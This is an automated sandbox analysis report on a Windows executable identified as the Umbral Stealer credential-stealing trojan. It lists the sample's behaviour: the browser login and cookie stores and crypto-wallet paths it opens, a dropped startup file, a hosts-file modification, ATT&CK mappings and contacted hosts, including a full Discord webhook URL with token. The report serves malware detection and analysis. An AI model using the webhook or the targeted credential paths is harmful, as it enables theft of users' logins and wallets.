                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\obvious.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Users\user\Desktop\obvious.exe | File written: C:\Windows\System32\drivers\etc\hosts

                        Stealing of Sensitive Information

                        Source: Yara match | File source: obvious.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Electrum
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Exodus
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Ethereum
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: keystore
                        Source: C:\Users\user\Desktop\obvious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\Desktop\obvious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\obvious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\obvious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\obvious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
                        Source: C:\Users\user\Desktop\obvious.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: Yara match | File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: obvious.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
                        ATT&CK Matrix (mapped techniques per tactic; the leading numerals are the signature-count badges as shown in the matrix, and matrix cells without a badge are omitted)

                        Reconnaissance: none
                        Resource Development: none
                        Initial Access: none
                        Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 PowerShell
                        Persistence: 1 DLL Side-Loading; 12 Registry Run Keys / Startup Folder
                        Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 12 Registry Run Keys / Startup Folder
                        Defense Evasion: 1 File and Directory Permissions Modification; 21 Disable or Modify Tools; 11 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 11 Masquerading; 41 Virtualization/Sandbox Evasion; 11 Process Injection
                        Credential Access: 1 OS Credential Dumping
                        Discovery: 22 System Information Discovery; 1 Query Registry; 211 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 Remote System Discovery; 11 System Network Configuration Discovery
                        Lateral Movement: none
                        Collection: 1 Archive Collected Data; 2 Data from Local System
                        Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol
                        Exfiltration: none
                        Impact: none
                        Behavior Graph (ID: 1500039; Sample: obvious.exe; Start date: 27/08/2024; Architecture: WINDOWS; Score: 100)

                        Start node:
                        • DNS/IP: ip-api.com, discord.com
                        • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
                        • Started process: obvious.exe

                        obvious.exe:
                        • DNS/IP: ip-api.com 208.95.112.1 (ports 49731, 49738, 80), TUT-ASUS, United States; discord.com 162.159.136.232 (ports 443, 49740, 49741), CLOUDFLARENETUS, United States
                        • Dropped files: C:\ProgramData\Microsoft\...\uGCIY.scr (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\AppData\...\obvious.exe.log (ASCII); C:\ProgramData\...\uGCIY.scr:Zone.Identifier (ASCII)
                        • Signatures: Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Self deletion via cmd or bat file; 7 other signatures
                        • Started processes: powershell.exe, cmd.exe, powershell.exe, 9 other processes

                        powershell.exe (first instance):
                        • Signature: Loading BitLocker PowerShell Module
                        • Started processes: WmiPrvSE.exe, conhost.exe

                        cmd.exe:
                        • Signature: Uses ping.exe to check the status of other devices and networks
                        • Started processes: conhost.exe, PING.EXE

                        powershell.exe (second instance):
                        • Started process: conhost.exe

                        9 other processes:
                        • Started processes: conhost.exe (three instances), 6 other processes

                        Source | Detection | Scanner | Label | Link
                        obvious.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer |
                        obvious.exe | 100% | Avira | HEUR/AGEN.1307507 |
                        obvious.exe | 100% | Joe Sandbox ML | |

                        Source | Detection | Scanner | Label | Link
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | 100% | Avira | HEUR/AGEN.1307507 |
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | 100% | Joe Sandbox ML | |
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | 79% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer |
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        https://contoso.com/License | 0% | URL Reputation | safe |
                        https://contoso.com/ | 0% | URL Reputation | safe |
                        https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                        http://ip-api.com | 0% | URL Reputation | safe |
                        https://oneget.orgX | 0% | URL Reputation | safe |
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                        https://docs.google.com/presentation/J | 0% | Avira URL Cloud | safe |
                        https://mail.google.com/mail/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe |
                        https://drive.google.com/drive/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe |
                        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                        http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
                        https://mail.google.com/mail/?usp=installed_webapp | 0% | Avira URL Cloud | safe |
                        https://contoso.com/Icon | 0% | URL Reputation | safe |
                        https://media.discordapp.net/attachments/1176050474064019486/12780529320964Pj | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/document/J | 0% | Avira URL Cloud | safe |
                        https://www.youtube.com/: | 0% | Avira URL Cloud | safe |
                        http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
                        https://discordapp.com/api/v9/users/ | 0% | Avira URL Cloud | safe |
                        http://discord.com | 0% | Avira URL Cloud | safe |
                        https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                        https://oneget.org | 0% | URL Reputation | safe |
                        https://mail.google.com/mail/: | 0% | Avira URL Cloud | safe |
                        http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
                        https://docs.google.com/document/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/presentation/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/presentation/: | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/spreadsheets/J | 0% | Avira URL Cloud | safe |
                        https://mail.google.com/mail/J | 0% | Avira URL Cloud | safe |
                        https://drive.google.com/?lfhs=2 | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/document/: | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/spreadsheets/?usp=installed_webapp | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/spreadsheets/: | 0% | Avira URL Cloud | safe |
                        https://www.youtube.com/s/notifications/manifest/cr_install.html | 0% | Avira URL Cloud | safe |
                        https://www.youtube.com/?feature=ytca | 0% | Avira URL Cloud | safe |
                        https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX | 0% | Avira URL Cloud | safe |
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | 0% | Avira URL Cloud | safe |
                        https://www.youtube.com/J | 0% | Avira URL Cloud | safe |
                        http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe |
                        https://discord.com | 0% | Avira URL Cloud | safe |
                        https://discord.com/api/v10/users/ | 0% | Avira URL Cloud | safe |
                        https://drive.google.com/: | 0% | Avira URL Cloud | safe |
                        http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
                        https://media.discordapp.net/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?e | 0% | Avira URL Cloud | safe |
                        https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex= | 0% | Avira URL Cloud | safe |
                        https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
                        https://drive.google.com/J | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/presentation/?usp=installed_webapp | 0% | Avira URL Cloud | safe |
                        https://github.com/Blank-c/Umbral-Stealer | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe |
                        https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ | 0% | Avira URL Cloud | safe |
                        https://media.discordapp.net/attachments/1176050474064019486/12780529320964 | 0% | Avira URL Cloud | safe |
                        http://ip-api.com/json/?fields=225545P | 0% | Avira URL Cloud | safe |
                        https://docs.google.com/document/?usp=installed_webapp | 0% | Avira URL Cloud | safe |
                        http://ip-api.com/json/?fields=225545 | 0% | Avira URL Cloud | safe |
                        http://crl.micros | 0% | Avira URL Cloud | safe |
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        discord.com | 162.159.136.232 | true | true | | unknown
                        ip-api.com | 208.95.112.1 | true | true | | unknown

                        Name | Malicious | Antivirus Detection | Reputation
                        https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX | true | Avira URL Cloud: safe | unknown
                        http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                        208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
                        162.159.136.232 | discord.com | United States | | 13335 | CLOUDFLARENETUS | true
                        Joe Sandbox version: 40.0.0 Tourmaline
                        Analysis ID: 1500039
                        Start date and time: 2024-08-27 20:04:09 +02:00
                        Joe Sandbox product: CloudBasic
                        Overall analysis duration: 0h 6m 39s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed: 32
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Sample name: obvious.exe
                        Detection: MAL
                        Classification: mal100.troj.adwa.spyw.evad.winEXE@39/23@3/2
                        EGA Information:
                        • Successful, ratio: 16.7%
                        HCA Information:
                        • Successful, ratio: 66%
                        • Number of executed functions: 265
                        • Number of non-executed functions: 19
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 142.250.186.35
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7212 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 8012 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 8132 because it is empty
                        • Not all processes were analyzed; the report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: obvious.exe
Time | Type | Description
14:05:03 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
14:05:05 | API Interceptor | 29x Sleep call for process: powershell.exe modified
14:05:06 | API Interceptor | 8109x Sleep call for process: obvious.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | Ödeme Talebi_27.08.2024.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | memreduct.exe | Get hash | malicious | Blank Grabber | Browse | ip-api.com/json/?fields=225545
208.95.112.1 | 172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | RFQ448903423_MAT_HASUE_de_Mexico.js | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | cotización_SIS20240500007257.pdf.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Recibo de envío de DHL_Guía de embarque Doc_PRG211003417144356060.PDF..exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Image Logger Installer.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Fatality.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | ip-api.com/json/?fields=225545
208.95.112.1 | smss.exe | Get hash | malicious | RMSRemoteAdmin, RDPWrap Tool, xRAT | Browse | ip-api.com/json
208.95.112.1 | RFQ20240513.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | ip-api.com/line/?fields=hosting
162.159.136.232 | S23UhdW5DH.exe | Get hash | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse | discord.com/administrator/index.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
discord.com | Fatality.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 162.159.136.232
discord.com | http://web3linksync.pages.dev/ | Get hash | malicious | Unknown | Browse | 162.159.136.232
discord.com | oBHZZU8EYd.exe | Get hash | malicious | Blank Grabber, DCRat, PureLog Stealer, Umbral Stealer, zgRAT | Browse | 162.159.136.232
discord.com | RebelCracked.exe | Get hash | malicious | Exela Stealer, Python Stealer | Browse | 162.159.138.232
discord.com | lol.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 162.159.138.232
